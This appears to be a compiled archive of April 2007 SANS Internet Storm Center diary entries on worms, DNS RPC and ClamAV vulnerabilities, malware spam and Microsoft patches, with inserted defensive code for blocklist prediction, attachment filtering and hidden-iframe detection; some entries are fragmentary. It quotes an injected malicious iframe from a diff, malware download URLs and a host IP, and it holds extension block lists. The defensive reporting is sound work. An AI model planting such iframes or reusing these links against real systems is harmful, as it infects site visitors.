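  bob:   ["198.51.100.1", "198.51.100.2", "203.0.113.7", "192.0.2.40"],
  carol: ["203.0.113.9", "198.51.100.2", "192.0.2.41"],
  dave:  ["192.0.2.99", "192.0.2.98", "192.0.2.97"],
};

// Jaccard similarity of two attacker lists (assumed metric for "how close" two submitters are).
function jaccard(a, b) {
  const A = new Set(a), B = new Set(b);
  let inter = 0;
  for (const x of A) if (B.has(x)) inter++;
  const union = A.size + B.size - inter;
  return union === 0 ? 0 : inter / union;
}

// Baseline: the "global worst offender" list, ranked by how many submitters reported each IP.
function globalWorstOffenders(submissions, limit = 5) {
  const counts = new Map();
  for (const ips of Object.values(submissions)) {
    for (const ip of new Set(ips)) counts.set(ip, (counts.get(ip) || 0) + 1);
  }
  return [...counts.entries()]
    .sort((x, y) => y[1] - x[1] || x[0].localeCompare(y[0]))
    .slice(0, limit)
    .map(([ip, reporters]) => ({ ip, reporters }));
}

// Predictive list for one submitter: attackers it has not seen yet, weighted by the
// similarity of the submitters who did see them. Unrelated submitters (similarity 0)
// contribute nothing, which is what separates this from the global count.
function predictiveBlocklist(target, submissions, limit = 5) {
  const mine = new Set(submissions[target]);
  const scores = new Map();
  for (const [who, ips] of Object.entries(submissions)) {
    if (who === target) continue;
    const sim = jaccard(submissions[target], ips);
    if (sim === 0) continue;
    for (const ip of new Set(ips)) {
      if (mine.has(ip)) continue; // already on the local list
      scores.set(ip, (scores.get(ip) || 0) + sim);
    }
  }
  return [...scores.entries()]
    .sort((x, y) => y[1] - x[1] || x[0].localeCompare(y[0]))
    .slice(0, limit)
    .map(([ip, score]) => ({ ip, score: Number(score.toFixed(3)) }));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("global :", globalWorstOffenders(SUBMISSIONS));
  console.log("alice  :", predictiveBlocklist("alice", SUBMISSIONS));
  console.log("dave   :", predictiveBlocklist("dave", SUBMISSIONS));
}
```

In the constructed data, every address alice has not seen yet was reported by exactly one submitter, so a global count cannot tell bob's 192.0.2.40 apart from dave's 192.0.2.99; the similarity weighting puts 192.0.2.40 first because bob's sensors see largely the same attackers alice's do, and leaves dave's addresses out entirely.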
New Rinbot scanning for port 1025 DNS/RPC
We are currently tracking a new version of the Rinbot worm that in addition to its regular scans, is also scanning for port 1025/tcp. Once connected, it attempts to do a Windows 2000 DnsservQuery, likely to exploit the recent Microsoft DNS vulnerability. Detection of this virus is currently very poor, and we are working with the AV vendors to improve this.
In the meantime, we would like to urge you to consider implementing the workarounds discussed in our previous diary entry.
New ClamAV version fixes buffer overflow vulnerability
If you're running a version of ClamAV 0.90, now is the time to upgrade to version 0.90.2, released last Friday. This version contains a fix for a buffer overflow vulnerability, CVE-2007-1997, identified by iDefense. An attacker can convince a user (or mail gateway) to scan a maliciously crafted CAB file that could lead to arbitrary code execution under the user account running the scanner.
As a temporary workaround, you could drop CAB files prior to executing the scanner. This is particularly relevant for e-mail gateways, which generally only need to allow a limited set of filetypes. The CAB format is an archive often used by Microsoft for software distribution, so on a web proxy this may be problematic.
Malware distributed through German-language spam mail
Eric wrote in with a new malicious message that is making the rounds in Europe. It's written in German, and contains a link to a Geocities account with an invisible iframe link. The content of one of the e-mails is below:
"Berlin subway employees found the remains of an unknown flying object.
The investigation into possible causes of the illness of some subway
employees is also found to be interesting. After numerous inspections a
foreign body was found. According to scientists, the body could be as big
as a bus. It was also suspected that it could have emitted strange rays,
because of a "dead zone" that formed around the hull.
More on this at http://geocities.com/[filtered]"
Very interesting story about an unidentified flying object and body found in the Berlin underground. The geocities URL mentioned is different in every single mail, and points to an index.html which contains a hidden iframe pointing to a server in Hong Kong, 58.65.239.106. While this host has likely been victimized, you may wish to temporarily block it on your web proxy.
That server is hosting a file update.exe which has spotty AV coverage at this time:
Antivirus | Version | Update | Result |
---|---|---|---|
AntiVir | 7.3.1.52 | 04.16.2007 | HEUR/Malware |
F-Secure | 6.70.13030.0 | 04.16.2007 | W32/Malware |
Ikarus | T3.1.1.5 | 04.16.2007 | Trojan-Spy.Win32.Goldun.lw |
Norman | 5.80.02 | 04.14.2007 | W32/Malware |
Sophos | 4.16.0 | 04.12.2007 | Mal/Binder-C |
VBA32 | 3.11.3 | 04.14.2007 | MalwareScope.Trojan-Spy.BZub.1 |
Webwasher-Gateway | 6.0.1 | 04.16.2007 | Heuristic.Malware |
--
Maarten Van Horenbeeck
Update on Microsoft DNS vulnerability
We received a couple of e-mails over the weekend asking us why this vulnerability was significant. Most public DNS servers should not be listening on the RPC ports, after all. Indeed, networks adhering to basic secure perimeter design would only allow port 53 UDP/TCP to the authoritative DNS servers, and definitely not the additional RPC ports required for exploitation.
However, there are at least two design scenarios that could prove an issue:
- The many Windows servers in use at dedicated hosters. In a large number of cases, these will be single box, do-it-all type hosting machines on the Windows 2003 Web Edition platform. They would be running FTP, HTTP and DNS services, but are usually not shielded by a separate firewall.
- Active directory servers hosted on the internal network are often combined with DNS functionality. These machines are usually less protected than DMZ DNS servers, and other functionality provisioned may require the RPC ports to be available (e.g. some authentication services). If your active directory server is compromised, the game is essentially over.
Also a small update on the Microsoft advisory:
- CVE-2007-1748 is now used to track the vulnerability;
- Microsoft added to their advisory that DNS server local administration and configuration may not work if the computer name is 15 characters or longer. They suggest using the FQDN (Fully Qualified Domain Name) of the host to ensure this works correctly.
--
Maarten Van Horenbeeck
Gaming Malware
-----Original Message-----
From: nospam@goteamspeak.com
Sent: Saturday, April 14, 2007 8:49 PM
To: <deleted>
Subject: New Team Speak Patch [Link Inside]
Now you can download new Team Speak patch. It will help you to use our
Team Speak servers.
We advise you to download it now
hxxp://www.goteamspeak.com/downloads/patch.exe
Many of our seasoned readers know where this is going. Unfortunately many gamers are not as aware of computer-based social engineering tricks and very likely downloaded "patch.exe" without a second thought. We downloaded the malware (it is no longer available, so happy hunting if you are looking for a sample) and ran it through VirusTotal. The results were not encouraging. The only hits we received were:
Antivirus | Version | Update | Result |
---|---|---|---|
CAT-QuickHeal | 9.00 | 04.14.2007 | (Suspicious) - DNAScan |
ClamAV | devel-20070312 | 04.15.2007 | Trojan.Spy-4392 |
Fortinet | 2.85.0.0 | 04.15.2007 | W32/LdPinch.BEO!tr.pws |
Ikarus | T3.1.1.5 | 04.15.2007 | Trojan-PWS.LDPinch.1607 |
Kaspersky | 4.0.2.24 | 04.15.2007 | Trojan-PSW.Win32.LdPinch.beo |
Panda | 9.0.0.4 | 04.15.2007 | Suspicious file |
Webwasher-Gtwy | 6.0.1 | 04.14.2007 | Win32.Malware.gen (suspicious) |
Additional Information
File size: 48640 bytes
MD5: 488b22114f1a08dc68a7e2cc34bf1d01
SHA1: 3da87252c917493e591c6ea222637910fff07a5e
There was some discussion a few hours ago in the TeamSpeak forums, but currently the forums appear to be offline. We'll keep monitoring this and will post any updates if needed.
Marcus H. Sachs
Director, SANS Internet Storm Center
More info on the Windows DNS RPC interface vulnerability
So it's likely that others have been compromised as well. If you have a vulnerable MS DNS server (Win2K SP4 or Win2003 SP1 or SP2) accessible to the Internet and don't have ports above 1024 blocked, then you may have already been targeted in an attack.
At this point, there seems to be a very small number of known compromises. We are interested in whether other sites have seen it. Has your IDS been alerting on shellcode for DCOM signatures where the port is above 1024? Have you seen portscans above 1024? Has your DNS.exe service died recently? (Apparently the service does not restart by itself.) If so, then let us know. And as always, if you have any packet captures of this activity please send them in.
Update: If you have a large number of domain controllers and want to automate the disabling of RPC, check out this blog entry: http://msinfluentials.com/blogs/jesper/archive/2007/04/13/turn-off-rpc-management-of-dns-on-all-dcs.aspx
Microsoft Vulnerability in RPC on Windows DNS Server
Microsoft has a few suggested actions that can mitigate the risk.
- Disable remote management over RPC for the DNS server via a registry key setting.
- Block unsolicited inbound traffic on ports 1024-5000 using IPsec or other firewall.
- Enable the advanced TCP/IP Filtering options on the appropriate interfaces of the server.
For more information, please see KB 935964 (Vulnerability in RPC on Windows DNS Server Could Allow Remote Code Execution).
---
Scott Fendley
ISC Handler
Svchost, Microsoft Updates, and 99% CPU Usage
Is this isolated to a couple people, or is this more widespread? Then, if it is widespread, and you fixed it, how did you do it? Share your insight!
(Thank you Noah, and other readers who wished not to be named for your submission!)
(Not being a Microsoft guy myself....)
Joel Esler
Handler o' the Day
http://handlers.sans.org/jesler
Cisco wireless equipment vulnerabilities
- WCS apparently uses fixed and unchangeable authentication credentials on the FTP service used by the Wireless Location Appliances for backup purposes. Fixed in WCS 4.0.96.0. This is regular FTP, so these passwords can be sniffed off the network and re-used by an attacker.
- WCS suffers from a privilege escalation vulnerability that allows valid users to access information from any WCS configuration page (fixed in 4.0.81.0) or to become a member of the SuperUsers group (fixed in 4.0.87.0).
- Certain WCS directories are not password protected. This may lead to disclosure of private information such as access point location. Fixed in 4.0.66.0.
Applicable to the WLC are:
- Use of default community strings (public/private);
- The device may be crashed by sending malformed ethernet traffic;
- Some or all of the Network Processing Units within the WLC may be locked up by sending malformed traffic, including some SNAP packets, malformed 802.11 traffic or packets with unexpected length values in headers;
- WLAN ACLs could in some cases not survive a reboot.
The Cisco Aironet 1000 and 1500 lightweight access points are reported to contain a hard-coded service password. This is only available over a physical console connection, though.
--
Maarten Van Horenbeeck
EXE/ZIP e-mail viruses (editorial)
$unzip -l patch-58214.zip
Archive: patch-58214.zip
Length Date Time Name
-------- ---- ---- ----
40649 04-12-07 18:21 patch-58214.exe
-------- -------
40649 1 file
anyway back to the editorial ;-)...
--------------------------------------------------------------------------------------
I label this diary "Editorial", as I would like to go beyond the plain facts of the recent set of "Storm"/"nuwar"/"zhelatin" viruses.
Remember Bagle? It was just a couple of years ago when a very similar set of viruses was making the rounds. Bagle arrived as a plain .exe, waiting for a gullible user to double click and execute it. Later, very much like the new "Storm" virus, it used an encrypted ZIP file.
Back with Bagle, we managed to get hold of some of the web logs from sites Bagle used to "call home". In analyzing these logs we found a large overlap in users infected by various Bagle variants. In short: the same users are getting infected over and over again by the "malware of the day".
I think these viruses offer a sad glimpse into the current state of Internet security. Not only have users still not learned to "never click on an executable"; network administrators have not learned to filter executables either. When was the last time you received a legitimate executable as an attachment? (NO! IE7.exe was not one of them!)
Lastly, "Storm" is yet another hint that current AV software is no longer an adequate means to protect yourself from current and relevant threats. Subscription based business models direct mainstream consumer anti-virus systems into a dead end of signature updates, which haven't worked at least since Zotob showed up.
As a reader of this post, you are unlikely to be able to do anything about the current sad state of anti-virus. But you may be able to block .exe files on your mail server. Don't ask me for subject or file names. Block executables!
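As an added example (not code from the diary, from ClamAV, or from any mail gateway product), a Python attachment policy check of the kind this editorial argues for; it also covers the CAB-dropping workaround from the ClamAV entry above. It flags blocked extensions, lists the entries of zip attachments (entry names stay readable even when the archive is password protected, since a ZIP password only encrypts entry data) and catches an "MZ" executable hiding behind an image name. The sample message, addresses and extension list are constructed.

```python
import email
import io
import zipfile
from email.message import EmailMessage

# Constructed gateway policy: attachment types a mail gateway has little reason to
# accept. .cab is on it as the temporary ClamAV CVE-2007-1997 workaround; the rest
# are the executable types the editorial says to block outright.
BLOCKED_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".cab")


def is_blocked_name(filename):
    """True if the file name ends in one of the blocked extensions."""
    return (filename or "").lower().endswith(BLOCKED_EXTENSIONS)


def zip_member_names(data):
    """Entry names of a ZIP archive, or [] if the bytes are not a ZIP.

    A ZIP's central directory is never encrypted: a password only protects the
    entry data, so a name like patch-58214.exe stays visible even in the
    password-protected archives discussed above.
    """
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return [info.filename for info in archive.infolist()]
    except zipfile.BadZipFile:
        return []


def looks_like_pe(data):
    """Cheap magic check: Windows executables start with 'MZ' whatever they are named."""
    return data[:2] == b"MZ"


def check_message(raw_bytes):
    """Return [(attachment_name, reason), ...] for everything the policy would drop."""
    msg = email.message_from_bytes(raw_bytes)
    findings = []
    for part in msg.walk():
        filename = part.get_filename()
        if part.get_content_maintype() == "multipart" or not filename:
            continue
        payload = part.get_payload(decode=True) or b""
        if is_blocked_name(filename):
            findings.append((filename, "blocked extension"))
        elif looks_like_pe(payload):
            findings.append((filename, "PE header in a non-executable attachment"))
        if filename.lower().endswith(".zip"):
            for member in zip_member_names(payload):
                if is_blocked_name(member):
                    findings.append((filename, "archive contains " + member))
    return findings


def build_sample_message():
    """Constructed sample mail, not a real one: an 'image' that is really a PE file
    plus a zip wrapping patch-58214.exe, the shape of the mails discussed above."""
    zip_buf = io.BytesIO()
    with zipfile.ZipFile(zip_buf, "w") as archive:
        archive.writestr("patch-58214.exe", b"MZ" + b"\x00" * 62)
    msg = EmailMessage()
    msg["From"] = "alert@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Worm Alert!"
    msg.set_content("The password for the patch is shown in the attached image.")
    msg.add_attachment(b"MZ" + b"\x90" * 30, maintype="image", subtype="jpeg",
                       filename="alert.jpg")
    msg.add_attachment(zip_buf.getvalue(), maintype="application", subtype="zip",
                       filename="patch-58214.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reason in check_message(build_sample_message()):
        print("DROP %s: %s" % (name, reason))
```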
whois.internic.net outage?
Joel Esler
Handler on Duty
http://handlers.sans.org/jesler
New Worm making the rounds?
Apparently it indicates itself as a "Patch" for the "New worm" that is going around (whatever that may be, there are just so many I could choose from!)
The Subject of the email (that we have seen so far) says "Worm Alert!".
It has two attachments, one being an image with "panic-worded text", and the other is a password protected zip file, whose password is revealed in the image.
ClamAV will not pick up the zip file, but it will pick up the .exe inside of it, and apparently names it "Trojan.Small-1641" (That's so descriptive!)
Joel Esler
Handler of the Day
http://handlers.sans.org/jesler
Oracle Critical Patch Update Pre-Release Announcement
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html
"This Critical Patch Update contains 37 security fixes across all products."
So, if you are running Oracle, it's that time of the month again!
Joel Esler
Handler of the Day
http://handlers.sans.org/jesler
Opera 9.20
A cut and paste of the "Security" section says:
Security
- Fix for character encoding inheritance issue with frames, which could enable cross-site scripting. See the advisory.
- Fixed an issue regarding handling of FTP PASV response, as reported by Mark at bindshell.net
- XMLHttpRequest now treats separate ports on the same server as a different server. Issue reported by Egmont Koblinger.
- Fixed an issue where scripts could continue to run after leaving the page, as reported by Herrmann Manuel.
- Skandiabanken.no's message about successful certificate installation is now shown.
Joel Esler
Handler of the Day
http://handlers.sans.org/jesler
Mailbag
- ICQ: should have updated itself by now, if not, make sure it did.
- AIM: make sure to upgrade to the latest greatest
--
Swa Frantzen -- NET2S
Microsoft black Tuesday patches - April 2007
Overview of the April 2007 Microsoft patches and their status.
Note there was an out of cycle patch for the ANI vulnerability that we reported on earlier and that same patch is included here once again for completeness.
# | Description | Affected | Contra Indications | Known Exploits | Microsoft rating | ISC rating(*) clients | ISC rating(*) servers |
---|---|---|---|---|---|---|---|
MS07-017 (rerun, out of cycle) | Multiple vulnerabilities, leading to privilege escalation, DoS and remote code execution. Replaces MS06-001 and MS05-053 and MS05-002 on Windows 2003 | Windows GDI. CVE-2006-5758 CVE-2007-1211 CVE-2007-1212 CVE-2006-5586 CVE-2007-0038 CVE-2007-1215 CVE-2007-1213 | KB 925902 Realtek HD audio control panel | Actively exploited SA 935423 | Critical | PATCH NOW | Important |
MS07-018 | Remote code execution and XSS scripting | MCMS (Microsoft Content Management Server) CVE-2007-0938 CVE-2007-0939 | KB 925939 | No known exploits | Critical | Important | Critical |
MS07-019 | Memory corruption leading to remote code execution | UPnP (Universal Plug and Play) CVE-2007-1204 | KB 931261 | PoC available in for-pay program | Critical | Critical | Critical(**) |
MS07-020 | URL parsing error leads to remote code execution | Microsoft Agent CVE-2007-1205 | KB 932168 | No known exploits | Critical | Critical | Important |
MS07-021 | Multiple vulnerabilities leading to remote code execution, privilege escalation and DoS | CSRSS (Windows Client/Server Run-time Subsystem) CVE-2006-6696 CVE-2007-1209 CVE-2006-6797 | KB 930178 | Known exploits since Dec 15th, 2006. MSRC blog | Critical | PATCH NOW | Critical |
MS07-022 | Buffer overflow leading to privilege escalation | Windows Kernel CVE-2007-1206 | KB 931784 | Details discussed publicly | Important | Important | Important |
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
- We use 4 levels:
- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
- Important: Things where more testing and other measures can help.
- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
- The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
- Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
- All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
--
Swa Frantzen -- NET2S
Pump and Dump reporting
Due to the global nature of this spam one needs to have a list of which address to report to.
USA: SEC:
- SEC wants your stock related spam
- Forward the spam to enforcement(AT)sec.gov
- You get a standardized reply for every report, typically during the next business day
Germany: BaFin:
- poststelle-ffm(AT)bafin.de
Australia: ASIC and ASX:
- ASIC has a form, way too impractical for dealing with individual spam messages
- info(AT)asx.com.au
If you have confirmed and working responsive addresses for other stock exchanges, please let us know.
Links:
http://en.wikipedia.org/wiki/Pump_and_dump
http://www.sec.gov/complaint.shtml
Thanks to our readers Axel and more for reporting in on this.
--
Swa Frantzen -- NET2S
Spam volume by category and year
-- William Stearns
movie.exe spammed
Thanks to Mike for submitting the first sample of this critter!
Not so funny.php
The first file, commonly included via IFRAME, contains a file part named "in.php?adv=1". This file contains an encoded blob of JavaScript, which is not reliably detected by AV (of the scanners I have at hand to verify, only Kaspersky, F-Secure and McAfee seem to recognize it at all). Once manually decoded, AV detection improves somewhat, but is still leaky. The decoded blob reveals a bunch of "friendly" little code snippets:
1. Exploit-Byteverify (a quite wizened Java exploit)
2. An exploit for MS06-014, with the code lifted almost verbatim from the corresponding Metasploit module
3. A copy of the MS06-057 WebViewFolderIcon.SetSlice exploit, artfully rendered to avoid detection
If any of these is successful, the exploit downloads and runs the mentioned "funny.php?adv=1" files, which invariably turn out to be Trojan downloaders or worse. The funny.php thingies are apparently refreshed frequently enough to keep AV coverage low to nonexistent.
While the three exploits are not at all lethal on a well patched PC, the prevalence and endurance of these not-so-funny PHPs suggests that there are still far too many PCs out there that fall for this sort of attack. We have informed the two affected ISPs in Germany and Malaysia, let's see who has staff on duty on an Easter weekend...
New MS DNS Vulnerability creeping up?
We will keep you posted as things progress. I will be sending on what we have discovered as well to MS tomorrow. It is 0130EST right now in the US, I will be passing the findings on to the other Handlers for review and input later this morning.
asus.com exploited
In the past days a handful of readers sent us notes that asus.com was compromised. Unfortunately we could not find anything wrong in the HTML at all.
Today the Kaspersky blog had an entry about an ANI exploit loaded via an iframe at asus.com.
So we fetched a new copy; still nothing to be seen. Until Johannes suggested asus.com might be load balanced, and indeed it seems it is using DNS load balancing:
$ dig asus.com a
; <<>> DiG 9.2.3 <<>> asus.com a
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19075
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0
;; QUESTION SECTION:
;asus.com. IN A
;; ANSWER SECTION:
asus.com. 14400 IN A 195.33.130.151
asus.com. 14400 IN A 205.158.107.130
;; AUTHORITY SECTION:
asus.com. 14400 IN NS dns3.asus.com.
asus.com. 14400 IN NS dns7.asus.com.
;; Query time: 18 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri Apr 6 23:33:01 2007
;; MSG SIZE rcvd: 96
Fetching a copy of the home page of both servers, and comparing the resulting page yields:
(line breaks added to make page easier to read)
$ diff index.html index.html.1
55c55
<
</table>
---
>
</table><iframe src=http://[DELETED].com/app/helptop.do?id=ad003
width=100 height=0></iframe>
Just goes to show that a load balanced site is a pain to investigate if only some of the servers are affected.
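The dig-and-diff procedure above, scripted as an added example (not part of the diary): resolve every A record for the name, fetch the page from each backend IP with the real Host header, and diff the copies against each other while flagging zero-sized iframes. The network code only runs when a hostname is passed on the command line; the sample pages and the RFC 5737 IPs are constructed.

```python
import difflib
import re
import socket
import sys
import urllib.request

# An <iframe> with a zero height or width: the "invisible" frame trick seen in the
# asus.com injection above (width=100 height=0) and in the Geocities pages.
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*\b(?:height|width)\s*=\s*[\"']?0\b[^>]*>", re.IGNORECASE)


def resolve_all_a_records(hostname):
    """Every IPv4 address behind the name, like `dig hostname a` on a round-robin setup."""
    infos = socket.getaddrinfo(hostname, 80, socket.AF_INET, socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def fetch_from_ip(hostname, ip, path="/", timeout=15):
    """Fetch the page from one specific backend by IP, sending the real Host header
    so a name-based virtual host still serves the right site."""
    req = urllib.request.Request("http://%s%s" % (ip, path), headers={"Host": hostname})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def find_hidden_iframes(html):
    """All zero-sized <iframe> tags in the document."""
    return HIDDEN_IFRAME_RE.findall(html)


def compare_copies(copies):
    """copies maps ip -> html of the same page fetched from each backend.

    Returns {ip: {"diff": [...], "hidden_iframes": [...]}} for every copy that
    differs from the baseline (the lowest ip) or carries a hidden iframe. The
    baseline is listed too when it carries one, so an infected baseline is not
    silently trusted just because the others were diffed against it.
    """
    ips = sorted(copies)
    baseline_ip = ips[0]
    baseline = copies[baseline_ip].splitlines()
    report = {}
    for ip in ips:
        diff = [] if ip == baseline_ip else list(difflib.unified_diff(
            baseline, copies[ip].splitlines(),
            fromfile=baseline_ip, tofile=ip, lineterm="", n=0))
        hidden = find_hidden_iframes(copies[ip])
        if diff or hidden:
            report[ip] = {"diff": diff, "hidden_iframes": hidden}
    return report


# Constructed sample pages (not fetched from anywhere): one clean backend and one
# carrying the kind of injected frame shown in the diff above.
CLEAN_PAGE = "<html><body><table><tr><td>Welcome</td></tr>\n</table>\n</body></html>"
INFECTED_PAGE = CLEAN_PAGE.replace(
    "</table>\n",
    "</table><iframe src=http://[DELETED].com/app/helptop.do?id=ad003 "
    "width=100 height=0></iframe>\n")
SAMPLE_COPIES = {"192.0.2.10": CLEAN_PAGE, "192.0.2.20": INFECTED_PAGE}


def print_report(report):
    for ip, entry in report.items():
        print("== %s ==" % ip)
        for line in entry["diff"]:
            print(line)
        for tag in entry["hidden_iframes"]:
            print("hidden iframe:", tag)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        host = sys.argv[1]
        copies = {ip: fetch_from_ip(host, ip) for ip in resolve_all_a_records(host)}
    else:
        copies = SAMPLE_COPIES
    print_report(compare_copies(copies))
```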
The script, at the time we looked at it, was obfuscated and led to a VBScript that's up to no good, pointing to another obfuscated JavaScript and an executable cloaked as a jpg file. That file gives the following over at VirusTotal:
Antivirus | Version | Update | Result |
---|---|---|---|
AhnLab-V3 | 2007.4.7.0 | 20070406 | - |
AntiVir | 7.3.1.48 | 20070406 | TR/Drop.Ag.344576.B |
Authentium | 4.93.8 | 20070406 | Possibly a new variant of W32/PWStealer.gen1 |
Avast | 4.7.936.0 | 20070406 | Win32:Tibs-ADO |
AVG | 7.5.0.447 | 20070405 | - |
BitDefender | 7.2 | 20070406 | - |
CAT-QuickHeal | 9.00 | 20070406 | (Suspicious) - DNAScan |
ClamAV | devel-20070312 | 20070406 | - |
DrWeb | 4.33 | 20070406 | - |
eSafe | 7.0.15.0 | 20070406 | suspicious Trojan/Worm |
eTrust-Vet | 30.7.3546 | 20070406 | Win32/NSAnti |
Ewido | 4.0 | 20070406 | - |
F-Prot | 4.3.1.45 | 20070404 | W32/PWStealer.gen1 |
F-Secure | 6.70.13030.0 | 20070406 | - |
FileAdvisor | 1 | 20070407 | - |
Fortinet | 2.85.0.0 | 20070406 | suspicious |
Ikarus | T3.1.1.3 | 20070406 | MalwareScope.Worm.Viking.3 |
Kaspersky | 4.0.2.24 | 20070406 | Trojan-PSW.Win32.OnLineGames.kw |
McAfee | 5003 | 20070406 | New Malware.bc |
Microsoft | 1.2405 | 20070406 | - |
NOD32v2 | 2171 | 20070406 | - |
Norman | 5.80.02 | 20070405 | - |
Panda | 9.0.0.4 | 20070406 | Suspicious file |
Prevx1 | V2 | 20070407 | - |
Sophos | 4.16.0 | 20070406 | Mal/EncPk-F |
Sunbelt | 2.2.907.0 | 20070403 | - |
Symantec | 10 | 20070406 | - |
TheHacker | 6.1.6.085 | 20070404 | - |
VBA32 | 3.11.3 | 20070406 | Trojan-PSW.Win32.Nilage.ara |
VirusBuster | 4.3.7:9 | 20070406 | - |
Webwasher-Gateway | 6.0.1 | 20070406 | Trojan.Drop.Ag.344576.B |
File:
Name | next3.png |
---|---|
Size | 100539 |
md5 | 42a248b8634da52d6044f87db9a8d794 |
sha1 | cf612836be3c763ab9dc2c9afc0ccc112f2c2a04 |
Date scanned | 04/07/2007 00:09:16 (CET) |
Password stealer it seems, same old goal.
I've not seen an ANI exploit in there right now, but we could easily be looking at something that's dynamic in some other way as well.
--
Swa Frantzen -- NET2S
iPod Linux virus PoC
http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2007-040516-4947-99&tabid=2
http://www.viruslist.com/en/weblog?weblogid=208187356
Microsoft April Security Bulletin Advance Notification
We've got four new bulletins coming out with a top severity of Critical and a requirement for rebooting.
Of note is the news that they will also be releasing a number of high priority non-security updates as well though no further information is available till next week.
http://www.microsoft.com/technet/security/bulletin/advance.mspx
Is WEP dead yet? Should it be?
Various Vista Concerns
telnetd deja vu, this time it is Kerberos 5 telnetd
References:
http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt
https://rhn.redhat.com/errata/RHSA-2007-0095.html
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=229782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0956 (not live yet)
Microsoft Patch Maybe Causing Some Problems
support.microsoft.com/kb/935448/
Other possible issues have been reported and are being investigated. Microsoft is asking anyone having problems after installing the patch to contact them at Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for the support relating to Microsoft Security Updates.
support.microsoft.com/
* Microsoft out of cycle patch
Overview of the out of cycle patch.
# | Description | Affected | Contra Indications | Known Exploits | Microsoft rating | ISC rating(*) clients | ISC rating(*) servers |
---|---|---|---|---|---|---|---|
MS07-017 | Multiple graphical format vulnerabilities. Replaces MS06-001 and MS05-053 and MS05-002 on Windows 2003 | Windows all versions CVE-2006-5758 CVE-2007-1211 CVE-2007-1212 CVE-2007-0038 CVE-2007-1215 CVE-2007-1213 | No known problems SA 935423 KB 925902 | Actively exploited | Critical | PATCH NOW | Important |
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
- We use 4 levels:
- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
- Important: Things where more testing and other measures can help.
- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
- The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
- Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
- All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
--
Swa Frantzen -- NET2S
Week of Vista bugs is a hoax
Now with April 1st just behind us we were ready for a good laugh with people falling for a hoax or two, but once it's April 2nd, you expect people to resume normal behavior.
Still, the first installment of the week of Vista bugs seemed bad on a quick skim, but just unfounded and hard to believe at all upon closer inspection.
A friendly contact gave us this link:
https://www.securinfos.info/english/the-week-of-vista-bugs-the-truth.php
Where the perps expose their own hoax.
Just don't believe everything you read on the Internet ... not even on April 2nd and the days after it.
And forget the Week of Vista bugs unless you urgently need a laugh.
--
Swa Frantzen -- NET2S
and in other news
- ie7.0.exe - This started appearing about the same time as the ANI exploits, mainly on web sites, but currently it is being distributed as SPAM messages. Typically an image SPAM message which links to a web page with the exploit. We've seen two names ie7.0.exe and DirectX-10.exe. Detection rates are improving and most AV products should catch this one. Once infected the compromised host will start to SPAM (but since we are all blocking executables, especially in emails this shouldn't be much of a problem).
- PHP scanning - We've had a few reports of PHP scanning coming out of Hong Kong (based on the source addresses). It seems to be fairly generic as it is hitting sites that do not have PHP as well as PHP sites.
- DST Part 2 - The original Daylight Savings Time start passed on the weekend. So far the only reports we've had were:
- Church Bells ringing at the wrong time
- A web site providing TV guides was out by an hour causing some initial confusion for one user at least
- April Fools - ISC did not participate in light of the ANI issue (disappointing several handlers who were all geared up to go) , but there were plenty of others who did. We received a number of emails that got a "check the date" reply.
Shearwater
*Microsoft to Release Out-of-Schedule Patch for ANI Vulnerability
